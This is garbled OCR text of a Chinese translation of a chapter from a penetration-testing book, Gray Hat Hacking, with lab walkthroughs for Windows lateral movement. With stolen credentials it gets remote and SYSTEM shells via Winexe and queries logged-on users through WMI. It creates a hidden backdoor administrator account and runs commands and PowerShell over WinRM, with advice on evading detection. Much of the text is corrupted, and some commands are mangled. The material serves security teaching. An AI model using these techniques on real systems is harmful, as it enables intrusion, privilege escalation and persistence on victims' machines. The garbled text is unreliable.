XS, Pure TR Winexe 访 问 远程 系统 。Winexe 通 过 目标 系统 上 隐藏 的 IPC 共 享 ， 
倍 助 命名 管道 创建 管理 服务 。 一 旦 创建 了 管理 服务 ， 束 可 以 连接 Winexe 并 以 服务 的 
形式 调用 命令 。 

要 验证 目标 系统 上 是 人 耕 存 在 IPC 共 享 ， 可 使 用 smbclient 命 令 列 出 目标 系统 上 的 


E a r 


A 


E 


# smbclient -U User$Passwordl -L 192.168.1.13 

WARNING: The "syslog" option is deprecated 
Domain=[DESKTOP-KRB3MSI] OS=[Windows 10 Enterprise 15063] 
Server=[Windows 10 Enterprise 6.3] 


Sharename Type Comment 

ADMINS Disk Remote Admin 

CS Disk Default share 

IPCS IPC Remote IPC 

Users Disk 
Connection to 192.168.1.13 failed (Error NT STATUS RESOURCE NAME NOT FOUND) 
NetBIOS over TCP disabled -- no workgroup available 


TAS AMHR TTE, KE Bi ata re A to BSCE RE LEN S 7; X 
格式 是 <DOMAIN>\<USERNAME>%<PASSWORD 。 这 里 ， 将 用 户 凭 证 指定 为 
User%Password1。-L 选 项 要 求 smbclient 列 出 系统 上 的 共享 。 可 以 看 到 ， 有 很 多 共享 ， 
其 中 包括 IPC$ 共 至 。 

了 解 到 可 使 用 IPC 共 享 后 ， 看 一 下 能 人 否 司 动 命令 提示 窗口 。 使 用 与 指定 用 户 名 
相同 的 语法 , 但 此 次 使 用 语法 /<IPADDRESS> 指 定 目标 系统 。 还 添加 --uninstall 标 志 ， 
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这 样 将 在 退出 时 凶 载 服务 。 最 后 为 cmd.exe 应 用 程序 指定 cmd.exe， 以 便 获 得 目标 系 
统 上 的 交互 式 shell。 
# winexe -U User$Passwordl --uninstall //192.168.1.13 cmd.exe 


Microsoft Windows [Version 10.0.15063] 
(c) 2017 Microsoft Corporation. All rights reserved. 


C: NWindowsNsystem32»whoami 

whoami 

desktop-krb3msiNuser 

现在 看 到 了 Windows 系 统 提 示 消 恩 (banner) 和 命令 提示 窗口 ， 这 意味 着 大 功 告 
成 。 接 下 来 要 检测 权限 级 别 ， 确 定 操作 权限 。 通 过 输入 whoami， 可 输出 shell 的 用 户 
ID。 此 时 ， 用 户 是 user， 这 意味 看 已 经 获得 这 个 用 户 的 权限 。 


警告 : 如 果 使 用 CtrLHC 退 出 shell， 或 未 使 用 --uninstall 标 志 ， 创 建 的 服务 将 
保留 在 目标 系统 上 。 这 对 攻击 人 员 是 非常 不 利 的 ， 相 当 于 留 下 了 使 用 远程 
访问 技术 的 踪迹 。 作 为 一 名 渗透 测试 人 员 ， 留 下 工件 (Artifact， 指 代 恶 意 代 
码 ) 后 ， 将 难以 确定 是 否 发 生 了 另 一 次 泄露 ,并 可 能 在 渗透 测试 人 员 离 开 系 
统 后 被 标 上 危险 信号 。 这 未 必 立 即 发 生 。 也 许 六 个 月 后 ， 可 能 就 有 人 盘问 
渗透 测试 人 员 是 否 留 下 了 恶意 服务 。 因 此 ， 如 果 工 件 未 加 清理 ， 测 试 人 员 
将 不 得 不 依靠 笔记 回答 一 些 非常 难受 的 问题 . 


最 后 , 要 退出 shell, 只 需要 在 命令 提示 窗口 中 输入 exit。 此 后 将 看 到 Bash 提 示 符 ， 
表示 已 经 退出 了 shell。 在 服务 器 端 ， 服 务 已 季 载 ， 连 接 断 开 。 


10.2.2 ”实验 10-3: 使 用 Winexe 提 升 权 限 


很 多 情况 下 ， 为 在 目标 系统 上 完成 操作 ， 需 要 提升 权限 。 在 前 一 个 实验 中 ， 渗 
透 测 试 人 员 可 以 普通 用 户 的 号 份 进行 访问 , 但 最 终 , 还 是 想 要 提升 为 SYSTEM 用 户 。 
由 于 SYSTEM 用 户 拥 有 系统 的 全 部 权限 ， 测 试 人 员 就 可 以 访问 凭证 、 内 存 和 其 他 有 
价值 的 目标 。 

要 执行 攻击 ,将 使 用 前 一 个 实验 中 用 到 的 全 部 选项 ,但 此 次 再 洪 加 --system 标 志 。 
这 样 ， 将 目 动 升级 权限 ， 最 终 得 到 高 权限 的 shell， 如 下 所 示 : 

# winexe -U User$Passwordl --uninstall --system//192.168.1.13 cmd.exe 


Microsoft Windows [Version 10.0.15063] 
(c) 2017 Microsoft Corporation. All rights reserved. 


C:\Windows \system32>whoami 
whoami 
nt authority\system 
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可 以 看 到 ， 测 试 人 员 正 以 SYSTEM 用 尸 的 遇 份 访问 受害 者 的 计算 机 。 虽 然 不 是 
本 实验 的 一 部 分 ， 但 这 允许 测试 人 员 转 储 插 证、 创建 新 用 户 、 重 新 配置 设备 ， 以 及 
执行 普通 用 户 无 权 执行 的 其 他 很 多 任务 。 


10.3 使 用 WMI 


WMI (Windows Management Instrumentation，Window 管 理工 具 ) 是 一 组 规范 ， 用 
于 跨 企 业 访问 系统 配置 信息 。WMI 人 允许 管 理 员 查看 有 关 目 标 系统 的 进程 、 补 本 和 硬 
件 等 信息 。WMI 能 根据 主 调用 户 的 权限 ， 列 出 信息 以 及 创建 、 删 除 和 更 改 数据 。 恶 
意 攻击 者 可 使 用 WMI 查 找 目标 系统 的 大 量 信息 ， 并 操纵 系统 状态 。 


10.3.1 实验 10-4: 使 用 WMI 查 询 系 统 信 息 


渗透 测试 人 员 可 以 使 用 WMI 答 询 系统 信息 ， 因 此 能 够 了 解 目标 系统 的 很 多 信 
轧 。 例 如 ， 可 能 想 知 道 哪些 用 户 以 交互 方式 登录 ， 从 而 判断 测试 人 员 有 无 被 抓 的 风 
险 。 在 本 实验 中 ， 将 使 用 两 种 不 同 的 WMI 查 询 方法 查看 哪些 用 户 登 录 到 目标 系统 。 

要 奏 询 WMI， 必 须 构 建 WMI 奏 询 语言 (WMI Query Language，WQL) 但 询 ， 获 得 
所 需 的 信息 。WQL 关 似 于 SQL， 用 于 数据 库 和 但 询 。 要 构建 租 询 ， 必 须 大 致 了 解 WMI 
的 工作 原理 。 渗 透 测 试 人 员 必 须 了 解 的 最 重要 事项 是 要 奏 询 的 类 。 本 章 提 供 的 “ 扩 - 
展 阅 读 ” 中 有 很 多 条 目 指 出 可 通过 WMI 访 问 的 Microsoft 类 列表 。 本 实验 只 分 析 其 中 
两 个 。 

渗透 测试 人 员 要 得 询 的 第 一 个 类 是 win32 logonsession， 其 中 包含 登录 会 话 的 信 
县 、 已 执行 的 登录 类 型 、 开 始 时 间 和 其 他 数据 。 首 先 组 合 一 个 查询 ， 然 后 分 析 如 何 
使 用 WMI 执 行 此 查询: 


select LogonType, Logonld from win32 logonsession 


使 用 此 奏 询 ， 从 win32 logonsession 类 选择 两 段 不 同 的 数据 。 第 一 段 是 
LogonType， 其 中 包含 执行 的 登录 类 型 。 第 二 段 是 LogonId， 表 示 登 录 会 话 的 内 部 ID 
编号 。 要 执行 此 得 询 ， 必 须 使 用 WMI 客 户 病 。Kali 拥 有 两 种 针对 WMI 碍 询 的 客户 疹 。 
第 一 种 是 pth-wmic， 第 二 种 是 Impacket 脚 本 的 一 部 分 。 在 pth-wmic 客 户 六 更 容易 编写 
脚本 ， 因 此 下 面 将 重点 介绍 这 个 客户 端 。 

pth-wmic 的 语法 与 上 一 个 实验 中 使 用 的 Winexe 工 具 类 似 。 以 同样 的 方式 指定 用 
户 和 主机 ， 然 后 在 命令 末尾 添加 WQL 碍 询 ， 如 下 所 示 : 

# pth-wmic -U User$Passwordl //192.168.1.13 "select LogonType, LogonId 


from win32 logonsession" 
CLASS: Win32 LogonSession 
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LogonId|LogonType 
99910 
997135 
993613 
1273458]2 
1272968 |2 
47231206|3 
10837213 
273 70]2 
3/5212 
39092 |72 
39138|2 


deh 可 了 解 到 会 话 和 登录 类 型 。 此 处 显示 了 很 多 登录 类 型 ， 哪 些 


会 话 是 令 人 感 兴趣 的 呢 ? 为 此 可 参阅 表 10-1, 其 中 显示 了 不 同 的 登录 类 型 及 其 含义 。 
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表 10-1 登录 会 话 的 登录 类 型 
登录 类 型 含义 
SYSTEMIIKJ? se, BUS BH TT RUD LAS EH 
交互 式 登 录 。 — 也 可 以 是 终端 服务 或 其 他 登录 类 型 (用 
网 络 登 录 。 这 是 用 于 WMI、SMB 和 其 他 非 交 互 远程 协议 的 登录 
服务 登录 。 这 种 登录 被 保留 用 于 运行 中 的 服务 ; 虽然 这 表示 凭证 可 能 存在 
于 内 存 中 ， 但 用 户 不 能 直接 与 系统 交互 
远程 交互 登录 。 这 通常 是 终端 服务 登录 


了 解 这 些 登 录 关 型 的 含义 后 , 将 查询 限制 为 登录 类 型 2。 从 中 可 了 解 到 需要 哪些 


登录 有 DD 以 查找 交互 式 用 户 登 录 。 


多 ， 
的 是 ， 很 难 通 过 WQL 来 得 找 特 定 登 录 ID， 因 为 值 是 字符 串 ， 不 是 整数 ， 因 此 可 以 使 


# pth-wmic -U User$Passwordl //192.168.1.13 "select LogonType, LogonId 
from win32 logonsession where LogonType-2" 

CLASS: Win32 LogonSession 

LogonId|LogonType 

1273458 [2 

1272968 |2 

397570ą|2 

9732112 

3909212 

3913812 


你 还 看 到 很 多 不 同 的 登录 。 先 分 析 其 中 三 个 。 一 个 编号 是 30 000 € , 一 个 是 50 000 
男 一 个 是 1 000 000 多 。 登 录 会 话 被 映射 到 win32 loggedonuser 表 中 的 用 户 。 遗 憾 
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用 pth-wmic 和 egrep 编 写 脚本 ， 指 癌 渗 透 测试 人 员 想 要 的 值 : 


pth-wmic -U UsergsPasswordl //192.168.1.13 'select * from 
win32 loggedonuser' \ 

| egrep -e 1273458 -e 37/570 -e 39092 
\\.\root\cimv2:Win32 Account.Domain-"DESKTOP-KRB3MSI",Name-"User"| 
\\.\root\cimv2:Win32 LogonSession.LogonId-"1273458" 
\\.\root\cimv2:Win32 Account.Domain-"DESKTOP-KRB3MSI",Name-"DWM- 1 " | 
\\.\root\cimv2:Win32 LogonSession.LogonId-"57570" 
\\.\root\cimv2:Win32 Account.Domain-"DESKTOP-KRB3MSI",Name-"UMFD-0" | 
\\.\root\cimv2:Win32 LogonSession.LogonId-"39092" 


可 以 看 到 三 个 值 : User、DWM-1 和 UMFD-0。DWM 和 UMFD 是 驱动 程序 使 用 
的 账户 , 尽 可 以 忽略 ,在 这 里 可 以 看 到 一 个 模式 , 因此 只 分 析 这 个 编号 超过 1 000 000 
的 进程 。 

# pth-wmic -U User$Passwordl //192.168.1.13 'select * from 

win32 loggedonuser' ^ 

| egrep -e 1273458 -e 1272968 

\\.\root\cimv2:Win32 Account.Domain-"DESKTOP-KRB3MSI",Name-"User"| 

\\.\root\cimv2:Win32 LogonSession.LogonId-"1273458" 


\\.\root\cimv2:Win32 Account .Domain-"DESKTOP-KRBSMSI", Name="User" | 
\\.\root\cimv2:Win32 LogonSession. LogonId="1272968" 


最 后 可 看 到 ， 这 些 会 话 登录 到 Kali 系 统 中 ， 对 象 都 是 User 用 户 。 使 用 WMI， 可 
确定 User 以 交互 方式 登录 到 系统 。 因 此 ， 如 果 执 行 的 操作 导致 窗口 弹出 或 破坏 ， 渗 
透 测试 人 员 可 能 暴露 自己 。 


10.3.2 ”实验 10-5: 使 用 WMI 执 行 命令 


大 致 了 解 WMI 后 ,下面 分 析 如 何 执行 命令 ,在 使 用 WMI 执 行 命令 时 有 两 个 选项 。 
可 使 用 WMI 创 建 一 个 新 进程 ， 然 后 监视 输出 ， 也 可 以 使 用 一 个 Kali 内 置 的 工具 。 本 
例 将 使 用 pth-wmis 二 进 制程 序 启 动 命令 , 但 这 要 求 创 建 一 个 位 置 来 捕获 命令 的 输出 。 

在 这 个 实验 的 设置 中 ， 将 加 载 最 新 的 Inpacket 涯 代码 以 及 使 用 为 之 提供 的 独立 
SMB 服 务 堪 。Impacket 是 一 系列 Python 脚本 , 允许 与 Samba 之 外 的 组 件 交 互 。Impacket 
经 常用 于 开发 需要 SMB 交 互 的 漏洞 攻击 工具 。 下 面 的 指令 用 于 获取 和 安装 最 新 
TA: 

# git clone https://github.com/CoreSecurity/impacket.git 

Cloning into 'impacket!... 

remote: Counting objects: 11632, done. 

remote: Compressing objects: 100$ (22/22), done. 

remote: Total 11632 (delta 7), reused 14 (delta 3), pack-reused 11607 


Receiving objects: 100$ (11632/11632), 3.92 MiB | 6.94 MiB/s, done. 
Resolving deltas: 100% (8806/8806), done. 
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# cd impacket/ 

# python setup.py install 

Bé P2KUR SUSMBJR A ar. ALL, 117023 — P a, XXE RI ORE SH Bd OA T LL 
作 。 将 使 用 刚才 安 帮 的 smbserverpy 脚 本 局 动 共 吾 。 渗 透 测试 人 员 需 要 将 /tmp 目 录 映 
Zn] #l|sharett $ CF, FARREA 

# service smbd stop 


# smbserver.py share /tmp/ 
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies 


[*] Config file parsed 

[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 
[*] Config file parsed 


现在 局 动 SMB 服 务 硕 ， 验 证 这 是 可 行 的 。 为 此 ， 使 用 smbclient 工 具 和 -N 标 志 ( 指 
示 不 使 用 有 身份 认证 )， 列 出 本 地 系统 上 的 共 宇 。 
# smbclient -N -L localhost 


WARNING: The "syslog" option is deprecated 
Domain-[ZwxSoyga] OS-[KiAuomIA] Server-[KiAuomIA] 


Sharename lype Comment 
SHARE Disk 
IPCS Disk 


UEF, SOARES. BISA SIKaliz& Zl )tmp Ho&;. MISA, 
因此 可 将 输出 重 定 同 到 共享 上 。Windows 的 一 个 好 处 在 于 ， 不 必 映 射 一 个 共享 即 可 
对 其 进行 读 写 操作 。 因 此 ， 登 录 的 用 户 不 会 注意 到 正在 加 载 一 个 异常 的 共享 。 

为 完成 基本 测试 ， "taie 命令 ， 将 某 些 内 容 回 显 到 文件 中 。 在 本 例 
将 使 用 类 似 于 pth-wmic 的 命令 ， 将 命令 退 加 到 末尾 。 针 对 Windows 目 标 运 行 此 命 

# pth-wmis -U User$Passwordl //192.168.1.13 'cmd.exe /c whoami \ 

> \\192.168.1.92\share\out.txt' 

[wmi/wmis.c:172:main()] 1: cmd.exe /c whoami > 

\\192.168.1.92\share\out.txt 

NTSTATUS: NT STATUS OK - Success 

# cat /tmp/out.txt 

desktop-krb3msiNuser 

接 下 来 做 一 些 更 有 趣 的 事情 。 首 移 创建 一 个 后 门 用 户 ， 以 便 稍 后 返回 。 将 该 用 
户 添 加 到 Administrators 本 地 组 ， 这 样 在 连接 时 ， 将 获得 完全 访问 权限 。 这 确保 用 户 
更 改口 令 后 ， 渗 透 测 试 人 员 仍 能 访问 目标 系统 。 开 始 时 ， 将 使 用 net user 命 令 创建 新 
用 户 evilhacker: 
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# pth-wmis -U User$Passwordl //192.168.1.13 \ 

'cmd.exe /c net user evilhacker Abc123! /add > 
\\192.168.1.92\share\out.txt' 

[wmi/wmis.c:172:main()] 1: cmd.exe /c net user evilhacker Abc123! /add > 
\\192.168.1.92\share\out.txt 

NTSTATUS: NT STATUS OK - Success 

root@kali:/tmp# cat /tmp/out.txt 

The command completed successfully. 


可 以 看 到 命令 成 功 了 , 但 在 使 用 WMI 时 , 这 只 意味 着 WMI 成 功 地 启动 了 二 进 制 
文件 ， 并 不 意味 看 活动 可 行 。 将 命令 的 输出 记录 到 一 个 文件 中 ， 但 看 应 用 程序 输出 
的 内 容 。 这 里 的 文件 显示 ， 命 令 成 功 完成 。 因 此 ， 系 统 上 就 有 了 一 个 新 用 户 ， 下 面 
使 用 net localgroup 将 这 个 新 用 户 添 加 到 Administrators 本 地 组 中 : 


# pth-wmis -U User$Passwordl //192.168.1.13 \ 

'cmd.exe /c net localgroup Administrators evilhacker \ 

/add > \\192.168.1.92\share\out.txt' 

[wni/wmis.c:172:main()] 1: cmd.exe /c net localgroup Administrators 
evilhacker /add > \\192.168.1.92\share\out.txt 

NTSTATUS: NT STATUS OK - Success 

# pth-wmis -U User$Passwordl //192.168.1.13 \ 

'cmd.exe /c net localgroup Administrators > 
\\192.168.1.92\share\out.txt' 

[wmi/wmis.c:172:main()] 1: cmd.exe /c net localgroup Administrators > 
\\192.168.1.92\share\out.txt 

NTSTATUS: NT STATUS OK - Success 

# cat /tmp/out.txt 

Alias name Administrators 

Comment Administrators have complete and unrestricted access to 


the computer/domain 


Administrator 

evilhacker 

User 

The command completed successfully. 

IRE, ub evilhacker FH 153/18] f Administrators KHE HP. FR EE BA DR 2] eB 
行 的。 渗透 测试 人 员 可 以 连接 并 为 Administrators 本 地 组 使 用 net localgroup, Mhiri 
示 用 户 。 现在 检查 输出 文件 ，evilhacker 用 户 己 经 在 Administrators 本 地 组 中 , I T o 
最 后 ， 必 须 进行 检查 ， 确 保 渗 透 测 试 人 员 拥 有 访问 权限 : 

# winexe -U 'evilhacker$Abc123!' --system --uninstall //192.168.1.13 cmd 


Microsoft Windows [Version 10.0.15063] 
(c) 2017 Microsoft Corporation. All rights reserved. 
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C:\Windows\system32>whoami 

whoami 

nt authority\system 

这 样 ， 就 成 功 创建 了 系统 后 | HARER HA PEE. 335b. MODE 
的 用 户 添加 到 了 Administrators 本 地 组 中 ， 以 便 将 权限 升级 为 SYSTEM 用 户 。 答 试 执 
行 winexe 命 令 时 ， 成 功 地 返回 命令 窗口 ， 硝 认 在 以 后 需要 的 时 候 ， 即 便 用 户 更 改 了 
口令 也 有 访问 权限 。 


10.4 利用 WinRM 


WinRM 是 Windows 系 统 支持 的 一 个 较 新 工具 。 从 Windows 8 和 Windows Server 
2012 开 始 ， 该 工具 创建 了 另 一 种 与 Windows 系 统 进行 远程 交互 的 方式 。WinRM 使 用 
SOAP 和 基于 Web 的 连接 与 目标 系统 进行 交互 。WinRM 支 持 HTTP 和 HTTPS， 也 文 持 
基于 基本 喘 份 认证 、 哈 硕 和 Kerberos 的 身份 认证 。 这 是 一 个 强大 的 工具 ， 还 允许 使 
用 基于 WMI 的 接口 编写 脚本 、 局 动 应 用 程序 以 及 与 PowerShell 交 互 。 


10.4.1 实验 10-6: 使 用 WinRM 执 行 命令 


WinRM 的 一 个 作用 是 允许 在 远程 系统 上 执行 命令 。 遗 憾 的 是 ， 截止 到 撰写 本 书 
时 ，Kali 中 并 没有 很 多 此 类 命令 行 工 具 , 但 有 一 个 名 为 pywinrm 的 Python 库 可 用 于 与 
WinRM 交 互 。 下 面 将 用 这 个 库 执行 命令 。Gray Hat Hacking GitHub 存 储 库 的 Ch10 目 
录 包 含 一 个 脚本 ， 可 帮助 执行 此 命令 。 首 先 需要 安装 pywinrm Python 模块 。 

为 此 , 打开 Kali 命 令 窗口 并 输入 pip install pywinrm。 这 将 下 载 和 安装 Python 模块 
以 及 所 需 的 其 他 任何 子 模块 。 安 装 完成 后 ， 确 保存 在 ghwinrm.py 脚 本 (可 从 本 书 资料 
中 获取 )。 信 助 WinRRM，ghwinrm.py 肢 本 使 用 pywinrm， 人 允许 渗透 测试 人 员 调 用 
PowerShell 命 令 或 命令 脚本 。 

ghwinrm.py 的 语法 类 似 于 渗透 测试 人 员 经 常 使 用 的 其 他 工具 。 下 面 使 用 
ghwinrm.py 运 行 一 个 简单 的 whoami 命 令 。 只 需要 指定 用 户 、 目标 和 将 要 运行 的 命令 : 


# ./ghwinrm.py -c -U user$Passwordl -t 192.168.1.13 whoami 

desktop-krb3msiNuser 

可 以 看 到 ， 像 通 第 那样 为 用 户 赁 证 指定 -U， 但 这 里 还 增加 了 一 些 语法 。-c 标 志 
的 舍 义 是 “运行 命令 ”。-t 标 志 指 定 目标 ， 并 将 命令 追加 到 末尾 。 虽 然 可 看 到 命令 成 
功 运行 了 ， 但 使 用 WinRM 和 WMI 运 行 命令 的 一 个 区 别 在 于 : 命令 不 维护 任何 状态 ， 
因此 无 法 使 用 交互 式 会 话 。 下 面 看 一 些 示 例 : 
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# ./ghwinrm.py -c -U user$Passwordl -t 192.168.1.13 cd 

C: NUsersNUser 

# ./ghwinrm.py -c -U user$Passwordl -t 192.168.1.13 cd c:\\ 
# ./ghwinrm.py -c -U user$Passwordl -t 192.168.1.13 cd 
C:\Users\User 


在 这 里 可 看 到 ， 使 用 cd 命令 显示 当前 目录 时 ， 当 前 处 于 User 目 录 中 。 当 使 用 cd 
命令 切换 到 根 目录 C: 时 ，cd 命 令 并 不 维护 状态 。 这 意味 看 ， 如 果 需 要 到 处 移动 ， 则 
必须 将 命令 放 入 堆栈 中 ， 如 下 所 示 : 

# ./ghwinrm.py -c -U user%Passwordl -t 192.168.1.13 'cd c:\ && dir' 


Volume in drive C has no label. 
Volume Serial Number is 9291-E8BB 


Directory of c:\ 


03/18/2017 02:03 PM <DIR> PerfLogs 
07/17/2017 09:21 AM «DIR» Program Files 
03/18/2017 07:48 PM «DIR» Program Files (x86) 
08/30/2017 11:10 PM «DIR» Users 
08/31/2017 05:54 PM <DIR> Windows 

0 File(s) 0 bytes 


5 Dir(s) 28,244,885,504 bytes free 


使 用 &&& 操 作 符 将 命令 放 入 堆栈 时 ， 可 四 处 移动 ， 并 在 同一 行 上 运行 多 个 他 令 。 
&& 操 作 从 的 售 义 是 ， 如 采 第 一 个 命令 成 功 执 行 ， 则 运行 第 二 个 命令 。 可 以 在 一 行 
中 使 用 多 个 &&&& 操 作答 ， 此 处 将 使 用 cd 切换 到 根 目 录 C:， 然 后 执行 dt 命令。 可 看 到 
根 目录 C: 的 内 容 ， 其 中 显示 已 经 成 功 切换 目录 并 运行 命令 。 

这 只 是 一 个 简单 示例 。 如 采 不 需要 运行 交互 式 会 话 ， 可 通过 使 用 WinRM 执 行 任 
何 命令 ; 这 包括 创建 和 操纵 服务 、 流 程 以 及 其 他 系统 状态 。 


10.42 ”实验 10-7: 使 用 WinRM 远 程 运行 PowerShell 


攻击 者 目前 经 常 使 用 PowerShell 技 术 与 系统 交互 。 由 于 很 多 系统 都 不 能 很 好 地 
记录 PowerShell 活 动 ， 攻 击 者 可 隐藏 起 来 。 为 此 ， 第 15 章 将 专门 介绍 如 何 使 用 
PowerShell 发 起 攻击 。 本 章 不 详细 介绍 PowerShell 攻 击 ， 但 将 讨论 如 何 使 用 
ghwinrm.py 脚 本 启动 一 些 简 单 的 PowerShell 命 令 : 


# ./ghwinrm.py -p -U user$Passwordl -t 192.168.1.13 "Get-Process" 


Handles NPM(K) PM (K) WS (K) CPU (s) Id SI ProcessName 


453 23 11464 29220 0.52 2000 1 ApplicationFrameHost 
41 4 1836 2492 0.00 2096 0 cmd 
.uncated for brevity 
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可 以 看 到 ， 将 -c 选 项 改 成 -p， 以 便 运行 PowerShell， 而 非 运 行 命令 窗口 。 用 户 和 
目标 选项 是 相同 的 ， 可 以 将 PowerShell 方 法 传递 给 脚本 来 运行 。 这 里 ， 可 以 获得 一 
个 进程 列表 ， 显 示 的 内 容 与 普通 的 PowerShell 相 同 。 这 看 上 去 不 错 ， 不 过 ， 如 果 能 
将 更 复杂 的 脚本 组 合 在 一 起 ， 将 可 以 在 目标 系统 上 完成 更 多 任务 。 

下 面 创建 一 个 简单 脚本 登录 到 系统 。 将 该 文件 保存 为 psscript。 


# cat psscript 


function Translate-SID 


{ 


} 


param ([string]$SID) 


SobjSID = New-Object System.Security. Principal .SecurityIdentifier ($SID) 


try { 
SobjUser = Sob]SID. Translate ([System. Security. Principal .NTAccount] 
return SobjUser.Value 

}catch{ 
return "Unknown" 


} 


Get-EventLog System -Source Microsoft-Windows-Winlogon | 
ForEach-Object(í 


} 


Sret = New-Object PSObject 
SUserProperty = Translate-SID $ .ReplacementStrings[1] 
Stime — $ .TimeGenerated 


$ret | add-Member UserID $UserProperty 
if($ .EventID -eq 7001) { 
$ret | add-Member Action "Logon" 
} else { 
Sret | add-Member Action "Logoff" 
} 
Sret | add-Member Time $time 
Sret 


该 脚本 输出 有 关 登 录 和 退出 系统 的 信息 、 操 作 类 型 以 及 执行 时 间 。 之 所 以 将 信 
恩 傈 存 到 文件 中 , 是 因 为 ghwinrm.py 脚 本 可 将 文件 作为 参数 , 通过 PowerShell 在 远程 
系统 上 运行 。ghwinrm.py 脚 本 不 会 在 目标 系统 上 留 下 任何 文件 ， 相 反 ， 运 行 的 是 
PowerShell 编 码 后 的 文件 ， 因 此 不 必 考 虑 脚本 签名 以 及 其 他 安全 限制 。 


# ./ghwinrm.py -p -U user$Passwordl -t 192.168.1.13 -f psscript 


UserID Action Time 


DESKTOP-KRB3MSI\User Logon 8/13/2017 8:46:15 PM 
DESKTOP-KRB3MSINUser Logoff 8/13/2017 12:41:19 PM 
DESKTOP-KRB3MSINUser Logon 8/13/2017 7:27:26 PM 


) 
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DESKTOP-KRB3MSINUser Logon 7/17/2017 4:53:09 AM 


es 这 里 使 用 -f 选 项 指定 要 运行 的 文件 ， 在 远程 系统 上 运行 时 ， 会 目 动 

登录 信息 。 这 只 是 一 个 脚本 示例 ， 但 可 能 性 是 无 限 的 。 要 记 住 ， 文 件 大 小 存在 
大 文件 无 法 生效 ， 但 是 拥有 无 限 智 意 的 灰 帽 黑客 们 可 以 通过 组 合 使 用 多 种 拉 
术 ， 突 破 这 个 限制 。 有 关 该 主题 的 详情 ， 可 参阅 第 15 草 。 


10.5 本草 小 结 


本 章 介 绍 了 多 种 利用 目标 系统 资源 发 起 攻击 的 方法 , VHA f fe HjResponderi 9j 
和 破解 凭证 ， 以 便 诱骗 LLMNR 和 NetBIOS 名 称 服务 进行 响应 。 这 样 ， 就 可 收集 使 用 
NetrNTLM 传 递 的 赁 证， 然后 使 用 John the Ripper 和 破解 凭证 。 

本 章 还 介绍 了 运行 命令 以 及 使 用 所 获 凭证 的 方法 ， peii igo Winexe fù 
许 建立 远程 交互 式 会话 。 本 章 还 使 用 WMI 答 询 系统 信息 和 运行 命令 。 我 们 使 用 了 
WinRM， 通 过 这 些 工 具 ， 不 仅 可 局 动 shell， 还 能 将 PowerShell 脚 本 传递 给 目标 。 

在 此 ， 灰 帽 黑 客 们 切记 : 尽 可 能 丈 芒 系统 内 置 的 功能 ， 做 到 “靠山 吃 山 ?， 使 用 
目标 系统 的 内 置 工具 和 流程 。 要 全 力 降 低 骏 露 目 身 的 风险 ， 降 低 在 受害 者 系统 上 留 
下 踪迹 的 可 能 性 。 
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为 什么 要 学 习 漏 洞 攻击? 道德 黑客 应 该 学 习 漏 洞 攻击 ， 以 便 了 解 示 个 漏洞 能 合 
被 利用 。 安 全 专家 有 时 会 错误 地 相信 并 及 表 这 样 的 声明 :“ 这 个 漏洞 是 不 可 利用 的 ”。 
但 黑 幅 黑客 却 知 道 事 实 并 非 如 此 。 一 个 人 不 能 找 出 利用 该 漏洞 的 攻击 方法 并 不 意味 
看 其 他 人 也 不 能 。 这 只 是 一 个 关于 时 间 和 技术 水 平 的 问题 。 因 此 ， 道 德 黑 客 必须 了 
解 如 何 利 用 漏洞 并 能 目 行 检查 。 在 这 个 过 程 中 ， 道 德 黑 客 可 能 需要 编写 概念 验证 
(Proof-of-Concept，PoCO) 代 人 码 并 同 厂 商 演 示 肝 个 漏洞 是 可 被 利用 的 , 因此 广 商 需要 修 
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堆栈 操作 和 函数 调用 过 程 
缓冲 区 演出 

本 地 组 冲 区 淤 出 漏洞 攻击 


11.1 SER BEER EAU AS 


XY “HER” Ce IN se Te RE A RC ST EB. d 
$US OEE SEHE ERT, RR BCE HEE Ta EE AE A FEST A PAESE 
ALF RESETS). MASE RE —-MSTEIN, REIMER AB TCE ER — (OX 
上 去 的 ) 餐 盘 。 在 计算 机 术语 中 ， 这 可 以 正式 表述 为 : 堆栈 是 一 种 具有 先进 后 出 (First 
In Last Out，FILO) 队 列 特性 的 数据 结构 。 

将 数据 放 入 堆栈 的 过 程 称 为 压 栈 (Push), 压 栈 在 汇编 语言 代码 中 是 通过 push 指 令 
完成 的 。 类 似 地 ， 从 堆栈 上 取出 数据 的 过 程 称 为 出 栈 (Pop)， 出 栈 在 汇编 语言 代码 中 
是 通过 pop 指 令 实现 的 。 

在 内 存 中 ， 每 个 进程 在 其 内 存 扒 栈 段 中 都 拥有 目 己 的 堆栈 。 记 住 ， 扒 栈 是 从 内 
存 高 地 址 处 同 低 地 址 处 反 同 增长 的 。 以 目 助 餐厅 里 的 餐 盘 为 例 ， 撒 部 餐 盘 的 内 存 地 
址 最 高 ， 顶 部 餐 盘 的 内 存 地 址 最 低 。 有 两 个 重要 的 寄存 器 人 负 贡 处 理 堆栈 : 基 址 指针 
(Extended Base Pointer，EBP) 和 栈 指 针 (Extended Stack Pointer，ESP)。 如 图 11-1 所 示 ， 
EBP 指向 进程 的 当前 栈 帧 (Stack Frame) 的 底部 ( 较 高 地 址 处 ), ESP 则 总 是 指向 栈 顶 ( 较 
低地 址 处 )。 
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二 teens 


低地 址 内 存 ， BSP EBP 高 地 址 内 存 ; 
Ox11111111 OxfHTHTHO 


图 11-1 EBP 和 ESP 在 堆栈 上 的 关系 


如 第 2 章 所 述 ， 图 数 是 一 个 独立 的 代码 模块 ， 可 由 包括 main0 在 内 的 其 他 函数 调 
用 。 当 调用 函数 时 ， 会 导致 程序 流 跳 转 。 在 汇编 代码 调用 函数 时 ， 将 发 生 以 下 三 件 


事情 : 
(1) 按照 约定 ， 调 用 程序 首先 按照 逆序 将 函数 参数 压 入 栈 中 ， 从 而 对 函数 调用 
进行 设置 。 


(2) 接 下 来 , 将 扩展 的 指令 指针 (Extended Instruction Pointer, EIP) 保 存 到 堆栈 上 ， 
这 样 程序 在 函数 返回 后 就 能 在 之 前 中 断 的 地 方 继续 执行 .将 这 个 地 址 称 为 返回 地 址 。 
(3) 最 后 执行 call 指 令 ， 将 该 函数 的 地 址 放 入 EIP 中 执行 。 


注意 : 本 章 给 出 的 汇编 代码 均 是 通过 gcc 编 译 选 项 -fno-stack-protector( 请 参 
见 第 2 章 中 的 相关 介绍 ) 生 成 的 。 这 样 将 禁用 堆栈 保护 ， 从 而 有 助 于 研究 缓 
